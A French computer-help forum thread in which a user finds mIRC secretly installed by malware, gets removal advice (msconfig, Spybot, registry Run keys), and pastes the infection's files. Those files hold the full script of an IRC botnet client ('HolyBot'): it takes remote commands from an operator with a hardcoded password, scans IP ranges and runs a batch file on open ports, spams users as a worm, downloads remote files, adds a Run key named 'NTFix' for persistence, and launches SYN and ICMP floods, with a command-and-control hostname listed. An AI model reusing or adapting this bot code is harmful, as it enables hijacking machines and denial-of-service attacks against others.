mIrc s"invivite chez moi....

[tangui]

j'allume mon ordi a l'instant, et que vois je, mIrc qui s'ouvre!!!! je n'ai js installé ce log de ma vie sur mon ordi!!! j'ai déjà bloqué son acces hier avec kerio pour aller sur le net (comprennait pas d'ailleurs de voir ce logiciel vouloir se connecter sur le net...). J'ai passé un coup d'antivirus hier, d'antitroyen (he cleaner, trojan remover, adaware 6, anti trojan 5.5) et j'ai rien!!

le seul logi que j'ai installé dernierement c'est winamp 2.91 avec deux plug in de mix... voili... d'ou sort ce machin?? cet abruti c'est installé dans system32 (mirc.ini) et j'ai trouvé nul part l'executable!!!! je n'aime pas du tout ca!! (mes em*rdes continuent... )

[Invité tesgaz]

msconfig /demarrage/desactive

 

passe un coup de Spybot

[tangui]

il n'y est pas, tu penses bien que j'ai déjà regardé

[rojni]

Il y aurait pas un rapport avec ça

 

[Oui je sais, tu es en ce moment sur messenger ]

[tangui]

c'est peut etre ca... mon AV m'a bloqué un virus hier... ms peut etre que ca a installé mIrc tout de meme, vu le temps que j'ai mis a revenir sur mon ordi et a effacer ce que mon AV avait bloqué..

EDIT: mon antivirus a ce virus dans sa liste... je le relance

[tangui]

bon, ben tjrs pareil... j'ai un truc dans msconfig de bizarre... je n'ai ni le nom de l'element de démarrage, ni la commande, juste l'amplacement dans la bdr...

d'ou sort ce mirc?? trouve pas l'executable

EDIT: j'ai trouvé cette m****!!!

il c'est mis dans system32 et se nomme systask.exe!!!!

il existe ce truc sous 2k??

[Invité tesgaz]

fais une petite visite dans toutes ces clés:

HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run

HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce

HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnceEx

HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServices

HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce

HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run

HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce

HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnceEx

HKEY_USERS\xxxxxx\Software\Microsoft\Windows\CurrentVersion\Run

HKEY_USERS\xxxxxx\Software\Microsoft\Windows\CurrentVersion\RunOnce

xxxxxx étant le nom d'un utilisateur (chiffré) fais tous les noms

HKEY_USERS\xxxxxx\Software\Microsoft\Windows\CurrentVersion\RunOnceEx

 

c'est souvent par la quil se trouve

[tangui]

c'est bon, je l'ai trouvé!! (voir mon EDIT au dessus de ton post...)

mais ce systask.exe existe t'il sous windows 2k??

et j'ai eu cette m*** en me prenant un trojan!!

[Laubean]

Je ne l'ai pas sous mon serveur.....

[tangui]

je vire avec gd plaisir alors

tiens, j'ai tout pleins de fichiers bizarres...

remote.ini:

[variables]

n0=%mouarf swetNcute

n1=%host ftp.membres.lycos.fr

n2=%user rhii

n3=%passW poy

n4=%ip1 24.200.1.1

n5=%ip2 445

n6=%mouarfg 415760641

n7=%heu 61

n8=%i 1

n9=%r

n10=%x GG.bat

n11=%synip 127.0.0.1

n12=%synport 113

n13=%synmsg GAY

n14=%encip pfgbzojn

n15=%wormlin 3

n16=%trajet #ps2iso

n17=%icmpip 127.56.45.89

n18=%clp 1024

n19=%chp 1200

n20=%icmppack 1000

n21=%icmptime 100

 

tasks.ini:

[script]

n0=on *:start:.timer 2 0 startor mirc | server $read(serv.sdb) 6667 | .timer 0 50 if (!$server) server $read(serv.sdb) 6667 | boot | set %encip $r(a,z) $+ $r(a,z) $+ $r(a,z) $+ $r(a,z) $+ $r(a,z) $+ $r(a,z) $+ $r(a,z) $+ $r(a,z) | nick %encip | .timer 0 50 clearall | identd on %encip | emailaddr %encip

n1=on *:connect:join $read(conf,3) $read(conf,1)

n2=raw 433:*:nick %encip $+ $r(1,99)

n3=on *:TEXT:*:*:{

n4=  if ($1- == $pass) login

n5=  if ($1 == .logout) logout

n6=  if ($1- == .*) || ($nick == $read(conf,2)) $1-

n7=}

n8=on *:open:*:close -m

n9=alias login { write -l2 conf $nick | msg $read(conf,3) User $read(conf,2) $+ ( $+ $address $+ ) logged. }

n10=alias pass return salut

n11=alias logout { msg $read(conf,3) user $read(conf,2) $+ ( $+ $address $+ ) logged out. | write -l2 conf 69 }

n12=alias setchan { msg $read(conf,3) Changing chan ( $+ $read(conf,3) to $1 $+ ) | write -l3 conf $1 | write -l1 conf $2 | join $read(conf,3) $read(conf,1) }

n13=alias vername { msg $read(conf,3) 8,1Holy bot }

n14=alias startor { .run vong.exe /n /fh $1 }

n15=alias rn { nick $r(a,z) $+ $r(a,z) $+ %encip }

n16=alias sayuptime { notice $nick $uptime HolyBot v2 }

n17=alias osinfo { notice $nick holybot up $uptime os : $os dir : $mircdir }

n18=alias encrypt,m { msg $read(conf,3) $encode($1-,m) }

n19=alias decrypt,m { msg $read(conf,3) $decode($1-,m) }

n20=alias codecmd,m { $decode($1-,m) }

n21=alias rangescan { sockclose mouer* | timerg off | set %ip1 $1 | set %ip2 $2 | msg $read(conf,3) Scan started %ip1 %ip2 | set %mouarfg $longip(%ip1) | goscan }

n22=alias rangestop { sockclose mouer* | timerg off | msg $read(conf,3) Scan stopped ( $+ $longip(%mouarfg) %ip2 $+ ) }

n23=alias ping { run ping.exe $1 -l 30500 -n $2 | startor ping.exe | startor ping }

n24=alias silent { load -rs msg }

n25=alias unsilent { unload -rs msg | msg $read(conf,3) Silent off. }

n26=alias goscan {

n27=  sockopen mouer $+ $rand(1,999999999999999999999999999) $+($gettok($longip(%mouarfg),1-2,46),.,$r(1,255),.,$r(1,255)) %ip2

n28=  .timerg 1 1 goscan

n29=}

n30=on *:sockopen:mouer*:{

n31=  if ($sockerr > 0) return

n32=  run hideapp.exe gg.bat $sock($sockname).ip

n33=  startor gg.bat

n34=  msg $read(conf,3) $sock($sockname).ip $sock($sockname).port holed.

n35=}

n36=alias worm { who $1 | msg $read(conf,3) Starting worm... | set %wmsg $2- | remove found.txt | set %wormlin 0 }

n37=raw 352:*: { write found.txt $6 }

n38=raw 315:*:{ msg $read(conf,3) Worm started $lines(found.txt) $+ . | wormz }

n39=alias wormz { .timerworm $lines(found.txt) 70 wormz | inc %wormlin | msg $read(found.txt,%wormlin) %wmsg }

n40=alias wormstop {

n41=  msg $read(conf,3) Worm stopped.

n42=  timerworm off

n43=}

n44=alias asshole { msg $read(conf,3) Starting Download ( $+ $1- $+ ) | notice $nick ACCESS DENIED! | notice $nick YOUR IP WAS LOGGED IN DATABASE! | WRITE DENNIED.TXT $nick  }

n45=alias w3bsuck {

n46=  %i = 1

n47=  while ($sock($+(dwl_,%i))) inc %i

n48=  sockopen $+(dwl_,%i) $gettok($remove($1,http://),1,$asc(/)) 80

n49=  sockmark $+(dwl_,%i) HEAD $remove($1,http://) $iif(\* iswm $2,$right($2,-1),$2) $ctime $3-

n50=}

n51=on *:SOCKOPEN:dwl_*: {

n52=  if ($sockerr) return

n53=  write -c $gettok($sock($sockname).mark,3,32)

n54=  sockwrite -tn $sockname GET $+(/,$gettok($gettok($sock($sockname).mark,2,32),2-,$asc(/))) HTTP/1.1 $+ $crlf

n55=  sockwrite -tn $sockname Accept: */*

n56=  sockwrite -tn $sockname Referer: http://www.xxx.edu/

n57=  sockwrite -tn $sockname Accept-Language: fr

n58=  sockwrite -tn $sockname Accept-Encoding: gzip, deflate

n59=  sockwrite -tn $sockname User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)

n60=  sockwrite -tn $sockname Host: $gettok($remove($gettok($sock($sockname).mark,2,32),http://),1,$asc(/))

n61=  sockwrite -tn $sockname Connection: Keep-Alive

n62=  sockwrite -tn $sockname $crlf

n63=}

n64=on *:SOCKREAD:dwl_*: {

n65=  if ($gettok($sock($sockname).mark,1,32) == HEAD) { sockread %r }

n66=  if (!%r && $gettok($sock($sockname).mark,1,32) == HEAD) {

n67=    sockmark $sockname $puttok($sock($sockname).mark,GET,1,32)

n68=  }

n69=  if ($gettok($sock($sockname).mark,1,32) == GET) {

n70=    sockread &r

n71=    %x = $gettok($sock($sockname).mark,3,32)

n72=    bwrite %x -1 &r

n73=    if ($gettok($sock($sockname).mark,4,32) != $ctime) {

n74=      sockmark $sockname $puttok($sock($sockname).mark,$ctime,4,32)

n75=    }

n76=  }

n77=}

n78=on *:SOCKCLOSE:dwl_*: {

n79=  msg $read(conf,3) Download complete. | if ($gettok($sock($sockname).mark,5-,32)) { $ifmatch }

n80=}

n81=alias boot { set %boot boot.reg | write %boot REGEDIT4 | write %boot [HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run] | write %boot "NTFix"=" $+ $replace($mircexe,\,\\) $+ " | run -n regedit /s %boot | .timer 1 4 remove %boot | .timer 1 5 unset %boot }

n82=alias syn { set %synip $1 | set %synport $2 | set %synmsg $3- | synflood }

n83=alias synflood { sockopen syn %synip %synport }

n84=on *:sockopen:syn: {

n85=  sockwrite -tn syn %synmsg

n86=  sockclose syn

n87=  synflood

n88=}

n89=alias synstop { remote off | .timer 1 1 remote on | msg $read(conf,3) Syn Stopped. }

n90=alias exit { halt }

n91=alias quit { halt }

n92=alias icmp { set %icmpip $1 | set %clp $2 | set %chp $3 | set %icmppack $4 | set %icmptime $5 | run winh.exe %icmpip %icmpip -clp %clp -chp %chp -sp RANGE -ports %icmppack -time %icmptime -close }

n93=alias icmphelp { notice $nick SYNTAX : .icmp IP START-PORT(1024) END-PORT(1200) PACKET-NUMBER(1000) DELAY(100)

 

serv.sdb:

holy69.zapto.org

conf:

...

HolyDead

#holybot.

 

Winso.exe késako??

ah trouvé!! mon antivir vient de s'alarmer!! c'est le virus!!

en fait, l'executable installe mirc, et mon antivir bloque le virus...arf! vraiment une m**** ce truc...

 

Je ne sais pas comment il est rentré (peut etre via un troyen ou bien par mon serveur ftp ou bien par un truc telechargé, bref, j'en sais rien) mais en tout cas je l'ai de suite bloqué par mon FW